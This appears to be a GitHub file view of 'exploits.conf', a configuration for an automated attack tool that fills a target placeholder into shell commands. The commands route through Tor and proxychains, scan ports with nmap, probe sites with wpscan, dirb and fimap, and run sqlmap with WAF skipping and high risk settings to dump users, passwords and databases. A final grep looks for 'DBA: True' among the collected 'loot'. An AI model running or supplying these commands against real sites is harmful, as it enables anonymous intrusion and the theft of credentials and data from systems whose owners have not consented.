-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploits.conf
16 lines (16 loc) · 1.8 KB
/
exploits.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
TYPE::COMMAND
MKDIR::service tor restart && mkdir -p output/_TARGET_
DIG::proxychains dig -4 _TARGET_ > "output/_TARGET_/dig_output.lst" | cat "output/_TARGET_/dig_output.lst"
GEOLOCATE::echo _TARGET_ > "output/_TARGET_/ip_geo.txt" && geoiplookup _TARGETIP_ >> "output/_TARGET_/ip_geo.txt" |cat "output/_TARGET_/ip_geo.txt"
SQLMAP::proxychains sqlmap -u "_TARGETFULL_" --dbms mysql --hex --output-dir "output/" --passwords --users --threads 10 --tables --dbs --skip-waf --random-agent --level 5 --risk 3 --batch --retries=1 --smart --is-dba --dump
NMAP::proxychains nmap -F -n -Pn -vvv --open _TARGETIP_ > "output/_TARGET_/nmap_output.lst" |cat "output/_TARGET_/nmap_output.lst"
WPSCAN::wpscan --url "http://"_TARGET_ --batch
NMAP::proxychains nmap -n -Pn -vvv --open -p 81,8001,8081 _TARGETIP_ -sV > "output/_TARGET_/nmap_output.lst" |cat "output/_TARGET_/nmap_output.lst"
NMAP::proxychains nnmap -vv _TARGETIP_ | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > "output/_TARGET_/nmap_ip_port_output.lst" |cat "output/_TARGET_/nmap_ip_port_output.lst"
SQLMAP::proxychains sqlmap -u "_TARGETFULL_" --dbms mysql --is-dba --users --passwords --skip-waf --random-agent --level 1 --risk 1 --batch --retries=1 --smart --output-dir="output/"
NMAP::proxychains nmap -n -Pn -vvv --open --top-ports 10 _TARGETIP_ -sV
FIMAP::proxychains fimap -u "http://_TARGET_" -4 -w "output/fimap__TARGET__found_urls.lst"
DIRB::proxychains dirb "http://"_TARGET_ |grep "200" > "output/_TARGET__dirb_output.lst" |cat "output/_TARGET__dirb_output.lst"
BLACKWIDOW::echo "BLACKWIDOW RUNNING" && proxychains blackwidow -l 1 -u "_TARGETFULL_" -d "_TARGET_" -s
SPIDER::echo "SPIDER SCRIPT" && python "/root/stuff/tools/webcite/crawl.py" --verbose --max-urls=10 --max-time 3 -d 4 "http://"_TARGET_
LOOTVIEW::command grep -RnslI "DBA: True"